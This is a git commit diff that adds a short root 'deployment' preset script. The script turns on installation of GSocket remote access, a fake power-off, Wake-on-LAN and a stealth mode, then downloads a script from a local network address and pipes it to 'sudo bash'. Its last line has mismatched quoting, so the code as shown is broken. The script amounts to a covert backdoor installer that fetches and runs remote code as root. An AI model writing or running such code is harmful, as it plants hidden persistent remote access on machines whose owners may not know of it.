refactor some scripts

This commit is contained in:
2025-04-06 20:20:23 +03:00
parent 01d459b467
commit f86e170184
7 changed files with 595 additions and 617 deletions

11
scripts/deploy/full Executable file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
# Full installation preset - requires root
export NO_ROOT=false
export NO_SERVICES=false
export INSTALL_WOL=true
export INSTALL_FAKE_POWEROFF=true
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script with sudo
eval "$(wget -qO- http://192.168.0.104/deployment/y" | sudo bash